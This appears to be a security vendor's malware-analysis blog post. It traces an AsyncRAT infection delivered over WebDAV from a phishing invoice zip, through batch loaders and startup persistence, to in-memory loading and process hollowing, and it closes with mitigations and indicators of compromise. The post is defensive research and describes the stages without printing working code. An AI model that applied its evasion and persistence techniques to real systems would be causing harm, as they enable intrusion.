Caught in the WebDAV: A Journey Through An AsyncRat Infection

February 26, 2025 Adam Radcliffe

Reverse engineering the AsyncRat malware infection, exploring the means of deployment and staging.

Technique Background

Attackers use a wide array of techniques to deploy malware onto a target including HTTP(S) file downloads and phishing attachments. WebDav is an infrequently used protocol that can also achieve this goal. WebDav was designed to make administering servers easier by giving administrators the ability to use existing tools, like Windows Explorer, to bring a familiar GUI to managing web server files.

In this blog we will look through an example of how the AsyncRAT was deployed via a trojan, using WebDAV as the delivery mechanism. A Remote Access Trojan (RAT) is a type of malware which gives an attacker remote control of a target system. After installation, it enables the attacker to monitor user activity, steal data, manipulate files, and execute commands. This can lead to further exploitation of systems or exfiltration of data.

Static Analysis

For this analysis we downloaded our samples from the online project operated by https://www.malware-traffic-analysis.net/. This project collects and shares malware samples with the community for security research. The sample is shared as a zip which we can load into a sandbox environment to perform our analysis.

The malware was distributed via a Dropbox link that was shared in a way to entice users to click on it. Once clicked, the link initiated the download of a file named ‘aktulle Rechnung.zip’ to the device,this was translated from German to ‘current invoice’.

The information from the artefacts, provided by malware-traffic-analysis, shows the device making a DNS connection to the ‘dl.dropboxusercontent[.]com’ domain, with a download being made just after.

The downloaded zip archive contains a further URL, internet shortcut, file named 'A1.net.rechnung'.

The contents of this file suggests that an interaction will cause a further file named 'Modelo-34.pdf.lnk' to be downloaded from the domain ‘sunshine-bizrate-inc-software.trycloudflare[.]com’. This connection would be via the DavWWWRoot protocol.

The downloaded file appears to be a benign PDF file at first glance. The image and filetype, generated by windows, however suggests this to be a shortcut file which is set to execute ‘cmd.exe’. The only way to identify this is through viewing the properties of the file.

The contents of this file suggests another file, named ‘file.bat’, would be downloaded from the attacker domain (‘sunshine-bizrate-inc-software.trycloudflare[.]com’) usingWebDav. This is downloaded to the ‘Pictures’ directory and execution is then attempted using ‘SHELL32.dll’.

We can examine the contents of the file that was downloaded here, in order to understand what this batch file is attempting to do.

The batch file here performed a number of activities including downloading and running of an ‘update.cmd’ and ‘windows.cmd’ file on the device. These operations were conducted via WebDav and the 'copy' command, saving further files to the user's 'Pictures' directory.

The script also downloads and opens a PDF file, seemingly as a decoy, to the device before moving another script to the startup folder likely to maintain persistence.

The persistence mechanism can be seen in the following ‘upgrade.bat’ script:

This batch file appears to be nearly identical to the ‘file.bat’, and its purpose is to re-download and execute the ‘update.cmd’ and ‘windows.cmd’ files. As the script is placed in the user's startup directory, it will automatically execute if the device is powered off and restarted. This persistence mechanism ensures that even if the device is cleaned up, the script will re-run and download a fresh copy of the malware, reintroducing the threat onto the system.

The ‘Windows_Update.bat’ file also checks whether Defender is running and if present, it loads a different script from the command and control server.

From here on the scripts were very well obfuscated using a combination of string concatenation implemented throughout the commands and then several layers of base64 encoding.

De-obfuscation of the ‘update.cmd’ suggests the following was executed

The deobfuscated 'windows.cmd' and ‘update.cmd’ file have been analysed and these suggest that the following is performed:

Setting up AES objects which are then used to Decrypt the data in variable ‘qvsTw’
Decompressing the data using GZip
Loading the data into memory with the ‘[System.Reflection.Assembly]::Load()’ method
Execution of the code

From here on the malware has been loaded into memory and will have been executed in the absence of any endpoint protection in place which could catch the execution of the program. At this point, to conduct any further analysis, we will need to attempt to run components of this malware in a sandboxed environment and monitor the execution to identify how this works.

Dynamic analysis

Unfortunately, by the time the analysis had begun, the command and control (C2) server ‘sunshine-bizrate-inc-software.trycloudflare[.]com’ was no longer serving data. Given the past use of this malware, and the levels of obfuscation seen here, this attack appears to be from a competent threat actor. This kind of malware has been seen in the past being targeted. Although, it is difficult to assess whether this is targeted or not in this case. If this was the case, this infrastructure has likely been pulled down to prevent further analysis of the command and control server.

Fortunately, the sample which we downloaded from malware-traffic-analysis contained a copy of the files likely downloaded from the C2. Due to our possession of the files, we ran the second stage in a sandbox environment to identify the chain of events and identify further information about this attack.

The payload was deployed to the device by running the ‘file.bat’ file through Explorer. The screenshot below shows the SenseOn platform triggering a High Priority Case for the malware on execution. Our sandbox environment currently has EPP disabled, should EPP have been enabled and running on this device, SenseOn software would’ve prevented any further execution.

We can investigate this case in a number of ways including viewing the process tree within the SenseOn platform. The process tree shows there are several programs which were executed. This allows us to see the ‘explorer.exe’ process spawning ‘notepad.exe’ instances and hidden command prompts. This then leads to ‘Powershell’ instances being run and lastly an ‘msedge’ instance. This is a much better way of looking at the chain of events and allows us to see everything which was performed by the malware.

We can also continue our investigation by reviewing the process telemetry from the device using Hunt Lab.

Once the ‘Modelo-34.pdf’ file is executed, we can observe it spawning multiple instances of the ‘notepad.exe’ program. These look to be sacrificial processes that will be hollowed out by the ‘[System.Reflection.Assembly]::Load()’ function on the ‘windows.cmd’ file identified in static analysis, and then used to run the malware. This attack vector is called ‘Process hollowing’ and is an advanced method used for detection evasion.

We can also see the ‘mmc.exe’ process being executed leading to the further execution of ‘WF.msc’. This is the snap-in used for editing the firewall settings on the device.

From this point on, we can see in the network telemetry that the process ‘notepad.exe’ is attempting to make outbound network connections to the IP ‘91.92.252[.]234’ on port 3232. Unfortunately as previously mentioned, the C2 server was down by the time the analysis was conducted, only the attempted connections can be observed with no upload or download of data.

Clearly, it is unusual activity for the Notepad process to be making network connections and this only becomes more obvious when we check the IP address in threat intelligence and see that this IP has been frequently flagged as malicious in the past.

Further analysis of this IP address resolves to the domain ‘limenet[.]io’, this isis an anonymised web hosting platform located in the Netherlands.

Conclusion

We have outlined the full execution process, starting from the user clicking on a link that was deceptively masquerading as a PDF file. This action triggered the downloading of an initial script, which in turn facilitated the retrieval of multiple files onto the targeted device. The malware utilised encryption techniques to load itself in a fileless manner, effectively bypassing tradition detection mechanisms and enabling remote access for the threat actor.

To mitigate this attack vector, organisations should focus on enhancing their detection and security measures. Advanced endpoint detection and response (EDR) solutions should be deployed to identify behaviours associated with fileless malware, such as unusual processes spawning or encrypted file execution. Regular security awareness training is essential to help employees recognise phishing attempts. Since this attack vector leveraged WebDav technology, securing these connections is critical. This can include enforcing encryption protocols (e.g. HTTPS), implementing strict access controls, and using Group Policy Objects (GPO’) to restrict WebDav usage or monitor for suspicious file-link activities.

IOCs

91.92.252[.]234
sunshine-bizrate-inc-software.trycloudflare[.]com
Modelo-34.pdf.lnk.bin (df019efc78f59c235dfdc568c52db8b5)
A1.net rechnung.url.bin (560c393ade4711048e3ef6778d60f3ae)
aktuelle Rechnung.zip (a5f42239bc514c1592a4407cf04c274e)
file.bat (152524d67ef46927a33b8a7149a7f60b)
file.ps1 (6bff8e7fd44581cf0be3ae26a36e9ed3)
loader.ps1 (d924535764653d4d497f8108eb3a73f6)
payload.ps1 (917fef2a008e78a5e636c189f86c878c)
update.cmd (25821577dc3c4fb26ad9459e6ea11c30)
windows.cmd (6f9a4373cca599a6b4d83408b2355da0)
Upgrade.bat (bf232dd0dccd2e49603dd49255ddcfc6)